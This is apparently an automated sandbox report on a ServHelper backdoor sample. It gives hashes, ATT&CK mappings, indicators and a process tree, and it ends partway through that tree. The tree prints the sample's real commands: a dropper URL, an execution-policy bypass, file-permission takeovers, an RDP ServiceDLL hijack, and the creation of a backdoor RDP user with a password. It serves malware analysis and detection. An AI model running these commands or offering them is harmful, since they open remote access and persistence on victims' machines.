servhelper | 52bb9b4983378e9f6320427b1f0e6f142de7ecbe3aae04b9f920274a706ae55d

Analysis

max time kernel
147s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240319-en
resource tags

arch:x64arch:x86image:win10v2004-20240319-enlocale:en-usos:windows10-2004-x64system
submitted
01-04-2024 23:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7d12718184f35c6818bc111a1f5c69c5_JaffaCakes118.exe
Size

5.7MB
MD5

7d12718184f35c6818bc111a1f5c69c5
SHA1

637806858f9c7f2fd2f2e4289e1b5afbe2c00b58
SHA256

52bb9b4983378e9f6320427b1f0e6f142de7ecbe3aae04b9f920274a706ae55d
SHA512

fafdb853d95478d56704e94fef6c3c95a409ba9573e6428684a49b0855f3dfb4717e7e28fd30d1943ffcdf11605046d735e2f042348318a54552c110171a03c9
SSDEEP

49152:vTbWVRE2rb/T/vO90dL3BmAFd4A64nsfJ1g8Dl5oVIqmen/tjgO6YdFN9I9Ws/Hd:vTiMvDEmAQQQQQQQQQQQQQj

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	Process
41	3780	powershell.exe
43	3780	powershell.exe
46	3780	powershell.exe
48	3780	powershell.exe
52	3780	powershell.exe
54	3780	powershell.exe
56	3780	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exe

pid	Process
4116	icacls.exe
1640	icacls.exe
1028	icacls.exe
4516	icacls.exe
3788	icacls.exe
2956	icacls.exe
1676	takeown.exe
1788	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid	Process
4260
4260

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	Process
3788	icacls.exe
2956	icacls.exe
1676	takeown.exe
1788	icacls.exe
4116	icacls.exe
1640	icacls.exe
1028	icacls.exe
4516	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x000700000002335d-101.dat	upx
behavioral2/files/0x000700000002335e-102.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
41	raw.githubusercontent.com
40	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	Process
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_eopud2pn.ofw.ps1	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIDF93.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIDF63.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIDFF4.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_y3sbejvp.gwe.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIDFC3.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIDFF3.tmp	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exe

pid	Process
1580	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 75e6552d647ada01	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
4248	reg.exe

Runs net.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc	stream
HTTP User-Agent header	43	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	46	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
4072	powershell.exe
4072	powershell.exe
4072	powershell.exe
832	powershell.exe
832	powershell.exe
832	powershell.exe
1312	powershell.exe
1312	powershell.exe
1312	powershell.exe
4344	powershell.exe
4344	powershell.exe
4344	powershell.exe
4072	powershell.exe
4072	powershell.exe
4072	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid	Process
656
656

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeDebugPrivilege	832	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	4344	powershell.exe
Token: SeRestorePrivilege	4116	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	1580	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1580	WMIC.exe
Token: SeAuditPrivilege	1580	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1580	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1580	WMIC.exe
Token: SeAuditPrivilege	1580	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3736	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3736	WMIC.exe
Token: SeAuditPrivilege	3736	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3736	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3736	WMIC.exe
Token: SeAuditPrivilege	3736	WMIC.exe
Token: SeDebugPrivilege	3780	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7d12718184f35c6818bc111a1f5c69c5_JaffaCakes118.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	Process	procid_target
PID 1016 wrote to memory of 4072	1016	7d12718184f35c6818bc111a1f5c69c5_JaffaCakes118.exe	99
PID 1016 wrote to memory of 4072	1016	7d12718184f35c6818bc111a1f5c69c5_JaffaCakes118.exe	99
PID 4072 wrote to memory of 4852	4072	powershell.exe	101
PID 4072 wrote to memory of 4852	4072	powershell.exe	101
PID 4852 wrote to memory of 4532	4852	csc.exe	104
PID 4852 wrote to memory of 4532	4852	csc.exe	104
PID 4072 wrote to memory of 832	4072	powershell.exe	108
PID 4072 wrote to memory of 832	4072	powershell.exe	108
PID 4072 wrote to memory of 1312	4072	powershell.exe	111
PID 4072 wrote to memory of 1312	4072	powershell.exe	111
PID 4072 wrote to memory of 4344	4072	powershell.exe	114
PID 4072 wrote to memory of 4344	4072	powershell.exe	114
PID 4072 wrote to memory of 1676	4072	powershell.exe	117
PID 4072 wrote to memory of 1676	4072	powershell.exe	117
PID 4072 wrote to memory of 1788	4072	powershell.exe	118
PID 4072 wrote to memory of 1788	4072	powershell.exe	118
PID 4072 wrote to memory of 4116	4072	powershell.exe	119
PID 4072 wrote to memory of 4116	4072	powershell.exe	119
PID 4072 wrote to memory of 1640	4072	powershell.exe	120
PID 4072 wrote to memory of 1640	4072	powershell.exe	120
PID 4072 wrote to memory of 1028	4072	powershell.exe	121
PID 4072 wrote to memory of 1028	4072	powershell.exe	121
PID 4072 wrote to memory of 4516	4072	powershell.exe	122
PID 4072 wrote to memory of 4516	4072	powershell.exe	122
PID 4072 wrote to memory of 3788	4072	powershell.exe	123
PID 4072 wrote to memory of 3788	4072	powershell.exe	123
PID 4072 wrote to memory of 2956	4072	powershell.exe	124
PID 4072 wrote to memory of 2956	4072	powershell.exe	124
PID 4072 wrote to memory of 3720	4072	powershell.exe	125
PID 4072 wrote to memory of 3720	4072	powershell.exe	125
PID 4072 wrote to memory of 4248	4072	powershell.exe	126
PID 4072 wrote to memory of 4248	4072	powershell.exe	126
PID 4072 wrote to memory of 4604	4072	powershell.exe	127
PID 4072 wrote to memory of 4604	4072	powershell.exe	127
PID 4072 wrote to memory of 2104	4072	powershell.exe	128
PID 4072 wrote to memory of 2104	4072	powershell.exe	128
PID 2104 wrote to memory of 4244	2104	net.exe	129
PID 2104 wrote to memory of 4244	2104	net.exe	129
PID 4072 wrote to memory of 3980	4072	powershell.exe	130
PID 4072 wrote to memory of 3980	4072	powershell.exe	130
PID 3980 wrote to memory of 4676	3980	cmd.exe	131
PID 3980 wrote to memory of 4676	3980	cmd.exe	131
PID 4676 wrote to memory of 236	4676	cmd.exe	132
PID 4676 wrote to memory of 236	4676	cmd.exe	132
PID 236 wrote to memory of 4588	236	net.exe	133
PID 236 wrote to memory of 4588	236	net.exe	133
PID 4072 wrote to memory of 1676	4072	powershell.exe	134
PID 4072 wrote to memory of 1676	4072	powershell.exe	134
PID 1676 wrote to memory of 1788	1676	cmd.exe	135
PID 1676 wrote to memory of 1788	1676	cmd.exe	135
PID 1788 wrote to memory of 4116	1788	cmd.exe	136
PID 1788 wrote to memory of 4116	1788	cmd.exe	136
PID 4116 wrote to memory of 1640	4116	net.exe	137
PID 4116 wrote to memory of 1640	4116	net.exe	137
PID 3364 wrote to memory of 4604	3364	cmd.exe	141
PID 3364 wrote to memory of 4604	3364	cmd.exe	141
PID 4604 wrote to memory of 3824	4604	net.exe	142
PID 4604 wrote to memory of 3824	4604	net.exe	142
PID 3440 wrote to memory of 4888	3440	cmd.exe	145
PID 3440 wrote to memory of 4888	3440	cmd.exe	145
PID 4888 wrote to memory of 4284	4888	net.exe	146
PID 4888 wrote to memory of 4284	4888	net.exe	146
PID 3216 wrote to memory of 2088	3216	cmd.exe	149
PID 3216 wrote to memory of 2088	3216	cmd.exe	149

C:\Users\Admin\AppData\Local\Temp\7d12718184f35c6818bc111a1f5c69c5_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\7d12718184f35c6818bc111a1f5c69c5_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4072
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hwgbfwad\hwgbfwad.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4852
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8BE4.tmp" "c:\Users\Admin\AppData\Local\Temp\hwgbfwad\CSC3D32D07398D24927877BC2DA1239463C.TMP"
      4⤵
      PID:4532
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:832
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4344
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1676
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1788
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4116
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1640
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1028
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4516
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3788
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2956
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:3720
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:4248
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:4604
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2104
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:4244
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3980
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4676
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:236
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:4588
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1676
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1788
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4116
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1640
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:4028
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:4976

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3364
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:3824

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 1HPN1Za7 /add
1⤵
- Suspicious use of WriteProcessMemory
PID:3440
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 1HPN1Za7 /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 1HPN1Za7 /add
    3⤵
    PID:4284

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
